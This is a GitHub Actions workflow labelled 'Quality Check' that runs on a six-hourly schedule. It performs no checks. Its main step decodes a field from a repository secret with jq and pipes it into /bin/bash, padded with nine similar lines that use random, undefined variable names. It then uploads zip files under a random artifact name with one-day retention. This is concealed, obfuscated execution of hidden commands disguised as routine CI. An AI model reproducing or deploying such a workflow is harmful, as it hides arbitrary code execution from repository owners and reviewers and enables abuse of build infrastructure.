name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '37 0,6,12,18 * * *'
permissions:
  contents: read
  actions: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  trigger:
    name: Run task
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - name: Checkout
        uses: actions/checkout@v4
      - name: Start
        env:
          gvo1: ${{ secrets.gvo1 }}
        run: |
          printf '%s' "$gvo1" | jq -r .q272 | /bin/bash
          echo $pa9587 | jq -r .lsig8 | /bin/bash
          printf '%s' "$qzx764" | jq -r .zolcm0 | /bin/bash
          echo $vk66903 | jq -r .yzryp0 | /bin/bash
          echo $ptak6 | jq -r .cvgmc9 | /bin/bash
          echo $a857 | jq -r .hk28 | /bin/bash
          echo $qui454 | jq -r .gkzz31 | /bin/bash
          printf '%s' "$asd36762" | jq -r .snu962 | /bin/bash
          echo $wzh77450 | jq -r .eogs7 | /bin/bash
          echo $eku43668 | jq -r .jiidq9 | /bin/bash

      - name: Save output
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: Pwiu4bfC
          path: "*.zip"
          retention-days: 1
